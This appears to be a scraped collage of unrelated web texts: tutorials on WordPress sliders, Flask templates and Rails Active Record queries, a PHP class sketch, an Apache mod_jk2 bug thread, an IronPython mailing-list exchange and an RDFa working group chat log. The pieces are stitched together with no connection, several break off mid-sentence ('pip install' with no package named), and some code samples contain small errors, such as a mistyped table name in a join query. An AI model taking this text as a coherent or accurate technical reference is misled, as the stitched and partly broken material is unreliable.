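For what it's worth, here is one way those comments could be filled in. This sketch assumes the assignment's Cipher class takes the integer key in its constructor and exposes encryptLine and decryptLine methods, as the existing outdata = c.encryptLine(indata) line implies; it also moves each prompt before the corresponding read, since the code above reads the choice before printing the question. No separate driver class is needed; main already drives the program.

import java.io.*;
import java.util.Scanner;

public class assign3 {
    public static void main(String[] args) throws IOException {
        Scanner key = new Scanner(System.in);

        // Get the encrypt/decrypt choice.
        System.out.println("Do you want to encrypt or decrypt?");
        String choice = key.nextLine();

        // Get the input and output file paths.
        System.out.println("Enter input file");
        String inPath = key.nextLine();
        System.out.println("Enter output file");
        String outPath = key.nextLine();

        // Get the key value.
        System.out.println("Enter key value");
        int shift = Integer.parseInt(key.nextLine());

        // Scanner to read from the input file, PrintWriter for the output file.
        Scanner fileIn = new Scanner(new File(inPath));
        PrintWriter fileOut = new PrintWriter(new File(outPath));

        // Cipher object with the int key as argument (class provided by the assignment).
        Cipher c = new Cipher(shift);

        while (fileIn.hasNextLine()) {
            String indata = fileIn.nextLine();
            String outdata = choice.equals("encrypt")
                    ? c.encryptLine(indata)
                    : c.decryptLine(indata);
            fileOut.println(outdata);
        }

        fileIn.close();
        fileOut.close(); // close PrintWriter
    }
}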
|
http://www.javaprogrammingforums.com/whats-wrong-my-code/11909-please-help-ceasar-cipher-program.html
|
CC-MAIN-2015-35
|
refinedweb
| 205
| 68.47
|
It has only been a short time since Microsoft open sourced the .NET framework, and yet the project does seem to be taking on a life of its own. Is this the genie out of the bottle?
Back in November the big news was that .NET was being open sourced, but it wasn't exactly clear what this actually meant. Instead of throwing open the current .NET code base as an on going project, .NET Core was established as a new project to construct a portable version of the libraries. What was initially disappointing was the very small number of classes uploaded to GitHub.
Now we have an update on how things are going from team member Immo Landwerth. The first thing to say is that the project has been forked over 1000 times. Are all of these people keen on contributing to the project? It could be an indication at least because there have been around 250 pull requests to date - including Microsoft's contributions.
At the moment the ratio of internal to external contributions is 48% to 52%, i.e. the Microsofties are slightly outnumbered. However, they are still in full control.
Not only that but if you want to contribute you have to sign a contributor license agreement (CLA). When a contributor submits a pull request the system automatically determines how big the change is. If it is small then it submits it with a cla-not-required but if it is big and you haven't already signed a CLA you are directed to fill in a web form where have to assert that you are not putting code which belongs to someone else into the code base.
What is even more interesting is that the project is now over 500K lines of code and 75% is still to be transferred. There is an Excel spreadsheet detailing what is on its way.
The libraries now in the repo are:
What is still mystifying is how useful the final .NET Core will be and how it will be integrated into main stream .NET development. There are so many unanswered questions. The bulk of most .NET applications is UI and yet there are no UI libraries listed in the spreadsheet.
There are also confusing comments such as
"Our current thinking is that we don't provide implementation that are inherently Win32 specific, for example, we'll not implement the registry. Unfortunately, that namespace also contains concepts that aren't really tied to Win32, such as handles and will most likely use for implementing general concepts across all operating systems (such as file IO)."
Yet, as you can see, the Microsoft.Win32.Registry library is already in the repo and others are listed in the spreadsheet. Does this mean only parts of the libraries are going to be implemented?
When asked what percentage of .NET will not be on GitHub we have the answer:
"... it's probably gonna be a fairly large number, considering the massive surface area of technologies like Windows Forms, WPF, and WF"
The bottom line is that it still isn't very clear where this particular juggernaut is going.
.NET Core Open Source Update
NetCore_OpenSourceUpdate.xlsx
|
http://www.i-programmer.info/news/89-net/8238-the-state-of-net-core.html
|
CC-MAIN-2018-09
|
refinedweb
| 623
| 64.1
|
Re: Is ADO Dead (3)?
- From: jasmith@xxxxxxxxxxxx
- Date: 20 Feb 2006 00:04:44
The Design of ADO.
ADO.NET: Explicit and Factored.
Forward-Only Read-Only Data Streams.
Returning a Single Value.
Disconnected Access to Data).
Retrieving and Updating Data from a Data Source.
Data Types: data as .NET Framework types, or as proprietary types defined by the classes in the System.Data.SqlTypes namespace.
Summary.
|
http://newsgroups.derkeiler.com/Archive/Comp/comp.databases.ms-access/2006-02/msg01725.html
|
crawl-002
|
refinedweb
| 119
| 71.41
|
Details
- Type:
Bug
- Status: Open
- Priority:
Major
- Resolution: Unresolved
- Affects Version/s: None
- Fix Version/s: None
- Component/s: None
- Labels: None
Description
Standby NN uses FSEditLogLoader to update its namespace. It can hold FSDirectory's writeLock for a long time when active NN generates lots of edits.
loadEditRecords:

fsNamesys.writeLock();
fsDir.writeLock();
...
try {
  while (true) {
    try {
      FSEditLogOp op;
      try {
        op = in.readOp();
        ...
      }
    }
  }
} finally {
  ...
  fsDir.writeUnlock();
  fsNamesys.writeUnlock();
}
With that fix in place, JMX response time is good for the active NN, as it no longer requires FSNamesystem's lock, even though it still needs to acquire FSDirectory's read lock during FSDirectory's totalInodes. That isn't an issue for the active NN, as each client RPC request might only acquire the FSDirectory lock for a short period of time. But the standby NN could hold the lock for a longer period of time.
There are two ways to fix this:
1. Fix standby NN to acquire FSDirectory's writeLock for each edit record.
2. Fix FSDirectory's totalInodes to not take readLock so JMX can still go through.
I like both approaches. I think #1 might be easier. Rather than re-locking for every edit, it would be preferable to batch edits within the lock. Either a fixed number of edits, or better yet as many as possible within a bounded amount of time.
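A rough sketch of that batching idea, reusing the names from the snippet above; the batch size and the applyEditLogOp helper are assumptions for illustration:

// Re-acquire the locks per batch so readers such as JMX can get in between.
final int BATCH_SIZE = 1000; // tuning knob, assumed value

boolean done = false;
while (!done) {
    fsNamesys.writeLock();
    fsDir.writeLock();
    try {
        for (int i = 0; i < BATCH_SIZE; i++) {
            FSEditLogOp op = in.readOp();
            if (op == null) { // no more edits
                done = true;
                break;
            }
            applyEditLogOp(op); // apply one edit while holding the locks
        }
    } finally {
        fsDir.writeUnlock();
        fsNamesys.writeUnlock();
    }
}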
|
https://issues.apache.org/jira/browse/HDFS-6306
|
CC-MAIN-2016-36
|
refinedweb
| 226
| 55.13
|
MVC is a very popular paradigm in web development and has been around for quite some time. The React framework is a powerful part of that Model-View-Controller trinity, because it focuses purely on the View alone. React is written in JavaScript and created by the Facebook and Instagram development teams.
React is being used all over the web to create rapid web applications that are easy to maintain due to the way the React framework structures the view layer code.
To get us started, here is a simple example of React taken from the official examples:
var HelloMessage = React.createClass({
  render: function() {
    return <div>Hello {this.props.name}</div>;
  }
});

React.render(
  <HelloMessage name="John" />,
  document.getElementById('container')
);
This example will render 'Hello John' into a <div> container. Take notice of the XML/HTML-like syntax that is used on lines 3 and 8 of the snippet. This is called JSX.
JSX is an XML/HTML-like syntax which is used to render HTML from within JavaScript code. React transforms JSX into native JavaScript for the browser, and with the tools provided you can convert your existing sites’ HTML code into JSX!
JSX makes for easy code-mingling as it feels just like writing native HTML but from within JavaScript. Combined with Node, this makes for a very consistent workflow.
JSX is not required to use React—you can just use plain JS—but it is a very powerful tool that makes it easy to define tree structures with and assign attributes, so I do highly recommend its usage.
To render an HTML tag in React, just use lower-case tag names with some JSX like so:
//className is used in JSX for class attribute
var fooDiv = <div className="foo" />;

// Render where div#example is our placeholder for insertion
ReactDOM.render(fooDiv, document.getElementById('example'));
There are several ways to use React. The officially recommended way is from the npm or Facebook CDN, but additionally you can clone from the git and build your own. Also you can use the starter kit or save time with a scaffolding generator from Yeoman. We will cover all of these methods so you have a full understanding.
First, check the Node versions installed on your machine and the ones available with nvm ls-remote. We need a version higher than 4.0.0 to work with React.
Install the newest version and set it as the default version with the following:
$ nvm install 4.2.1
$ nvm alias default 4.2.1
default -> 4.2.1 (-> v4.2.1)
$ nvm use default
Now using node v4.2.1 (npm v2.14.7)
Node is updated and npm is included in the deal. You’re now ready to roll with the installation.
Clone the repository with git into a directory named react on your system with:

git clone https://github.com/facebook/react.git react
Once you have the repo cloned, you can now use
grunt to build React:
# grunt-cli is needed by grunt; you might have this installed already,
# but let's make sure with the following
$ sudo npm install -g grunt-cli
$ npm install
$ grunt build
At this point, a
build/ directory has been populated with everything you need to use React. Have a look at the
/examples directory to see some basic examples working!
First of all download the starter kit.
Extract the zip and in the root create a
helloworld.html, adding the following:
<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8" />
    <title>Hello React!</title>
    <script src="build/react.js"></script>
    <script src="build/react-dom.js"></script>
    <script src="build/browser.min.js"></script>
  </head>
  <body>
    <div id="example"></div>
    <!-- src/helloworld.js contains:
         ReactDOM.render(<h1>Hello, world!</h1>, document.getElementById('example')); -->
    <script type="text/babel" src="src/helloworld.js"></script>
  </body>
</html>
In this example, React uses Babel to transform the JSX into plain JavaScript via the script tag with the text/babel type. That works for development, but for production you can precompile instead: run the Babel CLI over the src directory with the --watch flag, and build/helloworld.js will be auto-generated whenever you make a change! If you are interested, read the Babel CLI documentation to get a more advanced knowledge.
Now that babel has generated the
build/helloworld.js, which contains just straight-up JavaScript, update the HTML without any babel-enabled script tags.
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>Hello React!</title> <script src="build/react.js"></script> <script src="build/react-dom.js"></script> <!-- No need for Babel! --> </head> <body> <div id="example"></div> <script src="build/helloworld.js"></script> </body> </html>
So to recap, with babel we can load JSX directly inside a
script tag via the
text/babel type attribute. This is good for development purposes, but for going to production we can provide a generated JavaScript file which can be cached on the user’s local machine.
Generation of this copy is done on the command line, and as this is a repetitive task I highly recommend automating the process via using the
--watch flag. Or you can go a step further and utilize
webpack and
browsersync to fully automate your development workflow. To do that in the easiest path possible, we can automate the setup of a new project with a Yeoman generator.
Yeoman is a very useful tool for starting projects quickly and with an optimal workflow and tool configuration. The idea is to let you spend more time on development than configuration of the project’s work area, and to minimize repetitive tasks (be aware of this—RSI is the number one reason coders stop coding). So as a best practice, saving time with tools and implementing D.R.Y (Don’t Repeat Yourself) in your day-to-day life will boost your health and efficiency, and let you spend more time doing actual code rather than configuration.
There are a lot of scaffoldings out there, coming in many flavours for different scales of project. For this first example we will be using the
react-fullstack scaffolding from the Yeoman generators; you can see a demo of what the end result looks like.
Note: This is a fullstack configuration, which is probably overkill for any small projects. The reason I select this scaffolding is to give you a fully set-up environment, so you can see how the starter kit fleshes out into a larger app. There's a header and footer, and you can see where a user login and register feature will go, although they are not coded yet in the example. Install Yeoman and the React-fullstack scaffolding generator globally from npm, then run the generator to create your React app inside the directory:
$ yo react-fullstack
Yeoman will now create the directories and files required; you will be able to see updates about this in the command line.
With the scaffolding now set up, let’s build our project:
$ npm start
By default we start in debug mode, and to go live we just add the
-- release flag, e.g.
npm run start -- release.
You will now see the build starting and webpack initializing. Once this is done, you will see the webpack output telling you detailed information about the build and the URLs to access from.
Access your app via the URLs listed at the end of the output, with your browser by default at http://localhost:3000. To access the browsersync admin interface, go to http://localhost:3001.
Note: You may need to open the port on your server for the development port. For ubuntu / debian users with
ufw, do the following:
$ ufw allow 3001/tcp
$ ufw allow 3000/tcp
Let’s start working on creating a basic to-do list so you can see how React works. Before we begin, please configure your IDE. I recommend using Atom.
At the bash prompt, install the linters for React via apm:
apm install linter linter-eslint react
Installing linter to /Users/tom/.atom/packages ✓
Installing linter-eslint to /Users/tom/.atom/packages ✓
Installing react to /Users/tom/.atom/packages ✓
Note: the latest version of
linter-eslint was making my MacBook Pro very slow, so I disabled it.
Once that is done, we can get going on creating a basic list within the scaffolding we made in the prior step with Yeoman, to show you a working example of the data flow.
Make sure your server is started with
npm start, and now let’s start making some changes.
First of all there are three jade template files provided in this scaffolding. We won’t be using them for the example, so start by clearing out the
index.jade file so it’s just an empty file. Once you save the file, check your browser and terminal output.
The update is displayed instantly, without any need to refresh. This is the webpack and browsersync configuration that the scaffolding has provided coming into effect.
Next open the components directory and create a new directory:
$ cd components
$ mkdir UserList
Now, inside the
UserList directory, create a
package.json file with the following:
{ "name": "UserList", "version": "0.0.0", "private": true, "main": "./UserList.js" }
Also, still inside the
UserList directory, create the
UserList.js file and add the following:
//Import React
import React, { PropTypes, Component } from 'react';

//Create the UserList component
class UserList extends Component {

  //The main method render is called in all components for display
  render() {
    //Uncomment below to see the object inside the console
    //console.log(this.props.data);

    //Iterate the data provided here
    var list = this.props.data.map(function(item) {
      return <li key={item.id}>{item.first} <strong>{item.last}</strong></li>;
    });

    //Return the display
    return (
      <ul>
        {list}
      </ul>
    );
  }
}

//Make it accessible to the rest of the app
export default UserList;
Now to finish up, we need to add some data for this list. We will do that inside
components/ContentPage/ContentPage.js. Open that file and set the contents to be as follows:
/*! React Starter Kit | MIT License | */

import React, { PropTypes, Component } from 'react';
import styles from './ContentPage.css';
import withStyles from '../../decorators/withStyles';
import UserList from '../UserList'; //Here we import the UserList component we created

@withStyles(styles)
class ContentPage extends Component {

  static propTypes = {
    path: PropTypes.string.isRequired,
    content: PropTypes.string.isRequired,
    title: PropTypes.string,
  };

  static contextTypes = {
    onSetTitle: PropTypes.func.isRequired,
  };

  render() {
    //Define some data for the list; each item needs a unique id for React's key
    var listData = [
      { id: 1, first: 'Peter',  last: 'Tosh' },
      { id: 2, first: 'Robert', last: 'Marley' },
      { id: 3, first: 'Bunny',  last: 'Wailer' },
    ];

    this.context.onSetTitle(this.props.title);

    return (
      <div className="ContentPage">
        <div className="ContentPage-container">
          { this.props.path === '/' ? null : <h1>{this.props.title}</h1> }
          <div dangerouslySetInnerHTML={{__html: this.props.content || ''}} />
          {/* Use the UserList component as JSX */}
          <UserList data={listData} />
        </div>
      </div>
    );
  }
}

export default ContentPage;
Now when we save, webpack will rebuild and browsersync will display the changes in your browser. Take a look at the page source to see how it was rendered. Back in the UserList component, we define how the list will be rendered with:
var list = this.props.data.map(function(item) {
  return <li key={item.id}>{item.first} <strong>{item.last}</strong></li>;
});
Here it is important to note that React requires all iterated items to have a unique identifier provided under the
key.
Finally, an important point to note is that this example made use of extended components. This has a lot of benefits for semantically structuring your code. But you may wish to access a more bare-bones approach, as many other examples do.
So instead of
class ComponentName extends Component that you have seen before in this tutorial, you create a React class with the following syntax for example:
var MyListItem = React.createClass({
  render: function() {
    return <li>{this.props.data.text}</li>;
  }
});

var MyNewComponent = React.createClass({
  render: function() {
    return (
      <ul>
        {this.props.results.map(function(result) {
          return <MyListItem key={result.id} data={result}/>;
        })}
      </ul>
    );
  }
});
Well that wraps us up for this introduction to React. You should now have a good understanding of the following:
In the coming parts, we will discuss how to use JSX further, how to work with a database as a persistent data source, and also how React works with other popular web technologies such as PHP, Rails, Python and .NET.]]>.
ASP.NET Web API leverages the concepts of HTTP and provides features such as:
To create a Web API, we will use Visual Studio. If you have Visual Studio 2012 or a higher version of it, then you are all good to start off with your Web API.

Now let's look at how the URL that we provided to the browser is working.
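Since the routing walk-through was truncated here, a minimal sketch of the convention follows; the class and values below are illustrative rather than taken from the original article. With the default route template api/{controller}/{id}, a controller named ValuesController answers at /api/values, and Web API selects the action by HTTP verb:

using System.Collections.Generic;
using System.Web.Http;

public class ValuesController : ApiController
{
    // GET api/values
    public IEnumerable<string> Get()
    {
        return new[] { "value1", "value2" };
    }

    // GET api/values/5
    public string Get(int id)
    {
        return "value" + id;
    }
}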
Now that the basic idea of how Actions from Controllers can be exposed through the API is understood, let's look at how an API Service can be designed for clients.
Let's add another class ClassifiedService inside the BLL folder now. This class will contain a static method to access the repository and return business objects to the controller. Based on the search parameters, the method will return the list of classified items.
Finally, let's see how we can send an Image file as a response through Web API.
Let's create a folder called Images and add an image called "default.jpg" inside it, and then add the following Action method inside our ClassifiedsController.
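The listing itself did not survive formatting, but an action of this shape is the usual approach; the folder and file names follow the text above, and the rest is a sketch:

using System.IO;
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Web;
using System.Web.Http;

public class ClassifiedsController : ApiController
{
    [HttpGet]
    public HttpResponseMessage GetImage()
    {
        // Resolve the physical path of Images/default.jpg.
        var path = HttpContext.Current.Server.MapPath("~/Images/default.jpg");

        // Wrap the bytes in an HTTP response with the right content type.
        var response = new HttpResponseMessage(HttpStatusCode.OK)
        {
            Content = new ByteArrayContent(File.ReadAllBytes(path))
        };
        response.Content.Headers.ContentType = new MediaTypeHeaderValue("image/jpeg");
        return response;
    }
}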
And if you're looking for some additional utilities to purchase, review, or use, check out the .NET offering in CodeCanyon.
I hope you enjoyed this tutorial and found it useful for building your Web APIs for mobile devices. Thanks!
In this article, I am not planning to talk about object-oriented design in depth. The aim is to isolate every part of the design so you can concentrate on specific sections, while the system remains able to interact between sections. Layered Architecture is the idea of isolating each part in this way, based on years of experience and convention. By default, the upper layers can communicate with lower layers; if the lower layers need to connect with an upper layer, they must use patterns such as callbacks or observers.
If you are inspired to see how Domain-Driven Design could be applied, start by pointing the framework at the relocated controllers directory (a path ending in \Application\controllers).
And also you can configure the path of view in
config/view.php:
//...
'paths' => [
    realpath(base_path('App/Presentation')),
//...
Now that the paths are configured, we need to use a Data Mapper (Doctrine ORM) instead of Active Record (Eloquent).
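One way to pull Doctrine into a Laravel project is the community Laravel Doctrine package; assuming you are happy to take it as a dependency, the install is a single Composer command:

composer require laravel-doctrine/orm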
Stripe is a payment-processing service that comes with a suite of easy-to-use APIs and powers e-commerce for businesses of all sizes.
In this course, Envato Tuts+ instructor Jason Lewis will show you how to process payments on Stripe using Laravel Cashier.
Laravel is known for its powerful and developer-friendly router. The router allows you to configure all the URL endpoints of your app with a concise syntax and all in one place.
In this quick course, you'll learn how to put that router to work configuring the URL endpoints of your own app.
You can take all of these and more PHP courses with a free 10-day trial of our monthly subscription. So get started today, and start learning the practical Laravel skills that will take your PHP development work to a new level.
These are the articles we'll be drawing on in the remainder of the article.
The articles are:
In short, the articles above will introduce the concept of code smells, which we've been defining as the following:
[A] code smell, also known as a bad smell, in computer programming code, refers to any symptom in the source code of a program that possibly indicates a deeper problem.
And I will walk you through the steps needed to install PHP CodeSniffer on your machine.
But first, let's review what you'll need to follow along.
This should be a very short list. If you've followed along with the series up to this point, you need to have:
All of this is covered in detail throughout the previous articles in the series, but if you've gotten this far and are comfortable with the command line then this should be a cinch in comparison to what we've done so far.
With all of that said, let's get started.
First, locate the WordPress Coding Standards rules on GitHub. They're easy to find.
You can read all about the details of the project from the project page, but the most important thing I'd like to share is as follows:
This project is a collection of PHP_CodeSniffer rules (sniffs) to validate code developed for WordPress. It ensures code quality and adherence to coding conventions, especially the official WordPress Coding Standards.
I'd like to bring your attention to the phrase that this references the "official WordPress Coding Standards." Note that these rules are based on the WordPress Coding Standards. That is, you can't officially reference them.
If you're looking to find a way to look through the rules that WordPress defines, check out this article in the Codex. It's easy to follow, easy to read, but a lot to remember. Thankfully, we have the rule set linked above.
The important thing to note is that even if you aren't familiar with the rules, the CodeSniffer will find the problems with your code and will notify you of what you need to fix. Though you don't have to read the Codex article, it can sometimes help in identifying what's needed based on the errors or warnings the sniffer generates.
Assuming you've properly installed PHP CodeSniffer, let's add the WordPress rules to the software. For this tutorial, I'm going to do everything via the command line so as to be as platform agnostic as possible. I'll offer a few words regarding IDEs and rules at the end of the series.
Open your Terminal and navigate to where you have your copy of PHP CodeSniffer installed. If you've been following along with this series of tutorials, then you likely recall we have a
composer.json file that will pull this in for us. If not, remember to create
composer.json in the root of your project and add this to the file:
{ "require": { "squizlabs/php_codesniffer": "2.*" } }
Once done, run
$ composer update from your Terminal and you'll have everything you need to get going. To verify the installation, run the following command:
$ vendor/bin/phpcs --version
And you should see something like the following output:
PHP_CodeSniffer version 2.6.0 (stable) by Squiz ()
Perfect. Next, let's install the WordPress rules. Since we're using Composer (and will continue to do so), this is very easy to do.
Run the following command from within the root directory of your project:
composer create-project wp-coding-standards/wpcs:dev-master --no-dev
Note that you may be prompted with the following question:
Do you want to remove the existing VCS (.git, .svn..) history? [Y,n]?
If you know what you're doing, then feel free to go ahead and select 'n'; otherwise, you'll be fine hitting 'y'.
Now that PHP CodeSniffer is installed, and the WordPress rules are installed, we need to make sure PHP CodeSniffer is aware of our new ruleset. To do this, we need to enter the following command in the command line.
From the root of your project directory, enter the following command:
$ vendor/bin/phpcs --config-set installed_paths wpcs
To verify that the new rules have been added, we can ask PHP CodeSniffer to report to us the sets of rules that it currently has available. In the Terminal, enter the following command:
$ vendor/bin/phpcs -i
And you should see the following output (or something very similar):
The installed coding standards are MySource, PEAR, PHPCS, PSR1, PSR2, Squiz, Zend, WordPress, WordPress-Core, WordPress-Docs, WordPress-Extra and WordPress-VIP
Notice in the line above that we have several sets of rules regarding WordPress. Pretty neat, isn't it? Of course, let's see how this stacks up when we run the rule sets against a plugin like Hello Dolly.
Assuming you're working out of a directory that includes a WordPress plugin, then you can skip the following step. If, on the other hand, you do not have a copy of a WordPress script, file, theme, or plugin installed in the project directory, go ahead and copy one over to your project directory now.
As mentioned, we'll be testing the Hello Dolly plugin.
To run PHP CodeSniffer with the WordPress rules against the files in the plugin directory, enter the following command in the Terminal:
$ vendor/bin/phpcs --standard=WordPress hello-dolly
This will result in output that should correspond to what you see here:
FILE: /Users/tommcfarlin/Desktop/tutsplus_demo/hello-dolly/hello.php ---------------------------------------------------------------------- FOUND 14 ERRORS AFFECTING 14 LINES ---------------------------------------------------------------------- 2 | ERROR | Missing short description in doc comment 5 | ERROR | There must be exactly one blank line after the file | | comment 6 | ERROR | Empty line required before block comment 15 | ERROR | You must use "/**" style comments for a function | | comment 46 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 49 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 53 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 54 | ERROR | You must use "/**" style comments for a function | | comment 56 | ERROR | Expected next thing to be an escaping function (see | | Codex for 'Data Validation'), not '"<p | |$chosen</p>"' 59 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 62 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 63 | ERROR | You must use "/**" style comments for a function | | comment 64 | ERROR | Inline comments must end in full-stops, exclamation | | marks, or question marks 67 | ERROR | Expected next thing to be an escaping function (see | | Codex for 'Data Validation'), not '" | | ' ----------------------------------------------------------------------
Of course, some of these things may change depending on when you're reading this tutorial.
The errors should be pretty clear as to what needs to be fixed:
Note that although these are errors or warnings, the code will obviously still work. But let's pull this through end-to-end and see what it's like to fix up a plugin, arguably the most popular since it comes with each installation of WordPress, and review the differences in the quality of the code.
Note the plugin, before we begin working on it, includes the following source code:
<?php
/**
 * ...
 */

...
	) ] );
}

// This just echoes the chosen line, we'll position it later
function hello_dolly() {
	$chosen = hello_dolly_get_lyric();
	echo "<p id='dolly'>$chosen</p>";
}

// Now we set that function up to execute when the admin_notices action is called
add_action( 'admin_notices', 'hello_dolly' );

// We ...
	";
}
add_action( 'admin_head', 'dolly_css' );
?>
It should be relatively easy to follow as it uses only a few basic PHP features and Matt's done a good job of commenting the code.
But given the 14 errors that the CodeSniffer found, let's refactor the plugin. Taking into account the errors they presented and what it's expecting to see, let's address each of them.
Once done, the plugin should look like the following:
<?php
/**
 * This is a plugin that symbolizes the hope and enthusiasm of an entire
 * generation summed up in two words sung most famously by Louis Armstrong.
 *
 * @package Hello_Dolly
 * @version 1.6
 *
 * @wordpress-plugin
 * ...
 */

/**
 * Defines the lyrics for 'Hello Dolly'.
 *
 * @return string A random line from the lyrics to the song.
 */
...
	) ] );
}
add_action( 'admin_notices', 'hello_dolly' );

/**
 * This just echoes the chosen line, we'll position it later. This function is
 * set up to execute when the admin_notices action is called.
 */
function hello_dolly() {
	$chosen = hello_dolly_get_lyric();
	echo "<p id='dolly'>$chosen</p>"; // WPCS: XSS OK.
}
add_action( 'admin_head', 'dolly_css' );

/**
 * ...
 */
...
	"; // WPCS: XSS OK.
}
Notice that the plugin continues to work and the code is a bit cleaner. Lastly, let's verify that this passes the PHP CodeSniffer test. Let's re-run the code that we used above to initially evaluate the plugin.
$ vendor/bin/phpcs --standard=WordPress hello-dolly
And the output that we see:
Skyhopper5:tutsplus_demo tommcfarlin$
Exactly: There should be no output. Instead, it should be a return to the standard command prompt.
Excellent. The plugin has been brought up to standard. This is why having a code sniffer is so valuable: It finds the errors in your code based on the rules you define and then reports any errors that may exist.
Ultimately, this ensures that you're releasing the highest quality written code into a production-level site. Now, this does not mean you should avoid unit testing or other types of testing, nor does this mean bugs don't exist. It just means that your code is up to a high standard.
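One last convenience worth knowing: rather than passing --standard on every run, you can drop a phpcs.xml file in the project root, and PHP CodeSniffer will pick it up automatically when run without arguments. A minimal example (the ruleset name and file path are placeholders for your own project):

<?xml version="1.0"?>
<ruleset name="My WordPress Project">
    <description>Check the plugin against the WordPress Coding Standards.</description>
    <rule ref="WordPress"/>
    <file>hello-dolly</file>
</ruleset>

With that in place, a bare vendor/bin/phpcs run is equivalent to the command we used above.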
And with that, we conclude the series on using PHP CodeSniffer. Recall that throughout the series, we have covered the idea of code smells, how to refactor them, and what tools are available to us when working with PHP applications.
In this article, we saw how we can use a provided set of rules for the WordPress Coding Standards to evaluate our code while working on a new or an existing project. Note that some IDEs support the ability to execute the rules while writing code.
Although that's beyond the scope of this particular tutorial, you can find resources for this in various places throughout the web. Simply search for your IDE by name, determine its support for PHP CodeSniffer, and then make sure to install the WordPress rules as we've detailed in this tutorial.
If you enjoyed this article or this series, you might be interested in checking out other things I've written both on my profile page or on my blog. You can also follow me on Twitter at @tommcfarlin where I often talk about and share various software development practices within the context of WordPress.
With that said, don't hesitate to leave any questions or comments in the feed below and I'll aim to respond to each of.
To follow along, you'll need the setup from the earlier parts of this series.
The problem is that they're superimposed over each other, and they need to be next to the relevant person. Let's fix that.
That's looking better. Now to add some styling.
I want to change the font and add quotation marks around the text.
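The stylesheet rules themselves were lost in formatting; the following sketch shows the kind of thing involved. The .smooth_slider selectors and the Handlee Google font are assumptions to adapt to your own markup:

/* Apply the handwriting-style font to the slider text. */
.smooth_slider .slider_content p {
    font-family: 'Handlee', cursive;
    font-size: 1.4em;
}

/* Wrap each quote in curly quotation marks using generated content. */
.smooth_slider .slider_content p:before {
    content: '\201C';
}

.smooth_slider .slider_content p:after {
    content: '\201D';
}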
Fantastic! I now have my text in the right place with quotation marks around it. My client can now add as many quotes as they want, assign them to the appropriate sliders, and the conversation will continue.

The first step is the installation of ImageMagick on your machine. You need this for image processing. To install ImageMagick, use any of the steps below, depending on the type of machine you use.
Mac Users:
brew install imagemagick
Ubuntu users:
sudo apt-get install imagemagick
Use your terminal to generate a new application.
rails new paperclip
Open up your Gemfile and add the necessary gems:
gem 'paperclip'
gem 'devise'
Run bundle install when you are done.
From your terminal, install devise using the command below:
rails generate devise:install
When that is done, you can now generate your User model:
rails generate devise User
Migrate your database after.
rake db:migrate
Generate your devise views.
rails generate devise:views
Using your text editor, navigate to
app/views/layouts/application.html.erb and add the following code just above the
yield block.
#app/views/layouts/application.html.erb
<p class="notice"><%= notice %></p>
<p class="alert"><%= alert %></p>
Due to security reasons, we have to permit parameters in the Devise controller. Thanks to the awesome team behind Devise, doing this is easy.
Open up
app/controllers/application_controller.rb and paste in the following lines of code.
class ApplicationController < ActionController::Base
  protect_from_forgery with: :exception
  before_action :configure_permitted_parameters, if: :devise_controller?

  protected

  def configure_permitted_parameters
    devise_parameter_sanitizer.for(:sign_up) { |u| u.permit(:username, :email, :password, :password_confirmation, :remember_me, :avatar, :avatar_cache) }
    devise_parameter_sanitizer.for(:account_update) { |u| u.permit(:username, :password, :password_confirmation, :current_password, :avatar) }
  end
end
Open up your
User model and make it look like this:
#app/models/user.rb
class User < ActiveRecord::Base
  # Include default devise modules. Others available are:
  # :confirmable, :lockable, :timeoutable and :omniauthable
  devise :database_authenticatable, :registerable,
         :recoverable, :rememberable, :trackable, :validatable

  has_attached_file :avatar, styles: { medium: "300x300", thumb: "100x100" }
  validates_attachment_content_type :avatar, content_type: /\Aimage\/.*\Z/
end
You need to add an
avatar column to your Users table. There is a rails command that makes this possible from your terminal.
rails generate migration add_avatar_to_users
That will create a new migration in
db/migrate. Open it up and paste the below code:
class AddAvatarToUsers < ActiveRecord::Migration
  def up
    add_attachment :users, :avatar
  end

  def down
    remove_attachment :users, :avatar
  end
end
Run your migration
rake db:migrate
You will edit your registration new form
app/views/devise/registrations/new.html.erb and edit the form
app/views/devise/registrations/edit.html.erb to what I have below:
#app/views/devise/registrations/new.html.erb
<h2>Sign up</h2>

<%= form_for(resource, as: resource_name, url: registration_path(resource_name), html: { multipart: true }) do |f| %>
  ...
  <div class="field">
    <%= f.file_field :avatar %>
  </div>

  <div class="actions">
    <%= f.submit "Sign up" %>
  </div>
<% end %>

<%= render "devise/shared/links" %>
Kick off your browser and check out what you have.
For a standard application, you might want to check if a user who wants to edit his or her profile already has an avatar uploaded. This is easy to implement in your registration edit file.
Open up the registration edit file and make it look like this:
...
<% if @user.avatar? %>
  <%= image_tag @user.avatar.url(:thumb) %>
<% end %>
...
Can you see what changed?
In the above code, there is a conditional statement to check if an avatar already exists for a user using the line
<% if @user.avatar? %>. If this returns true, the next line gets run, else it does not.
Validation is always important when enabling uploading features in your web application. Paperclip comes with measures to secure your application.
You can use any of the validations below in your model.
class User < ActiveRecord::Base
  has_attached_file :avatar

  # Validate content type
  validates_attachment_content_type :avatar, content_type: /\Aimage/

  # Validate filename
  validates_attachment_file_name :avatar, matches: [/png\Z/, /jpe?g\Z/]

  # Explicitly do not validate
  do_not_validate_attachment_file_type :avatar
end
You might want to consider Paperclip as you build your next web application. It has a great team supporting it.
To explore other features not covered in this tutorial, check Paperclip's GitHub page.
Ultimately, we're working towards implementing WordPress-specific code sniffing rules, but before we do that it's important to familiarize yourself with PHP CodeSniffer.
In this article, we're going to take a look at what PHP CodeSniffer is, how to install it, how to run it against an example script, and how to refactor said script. Then we'll look at how we're going to move forward into WordPress-specific code.
If you have a local development environment set up, then great; if not, that's fine. I'll provide some links that will get you up and running quickly.
With that said, let's get started.
Before getting started, it's important that you have some type of local development environment, even if this only includes a copy of the PHP interpreter.
To follow along, you'll need:
In the next part, we'll add CSS to our theme to position the text correctly, creating the conversation effect, and to style it.
So let's get started!
I'm adding styling in my stylesheet because I want to use Google fonts, so I'm not too worried about the settings for the fonts, but you might prefer to tweak those in the settings screen.
The next step is to add the sliders and populate them with posts.
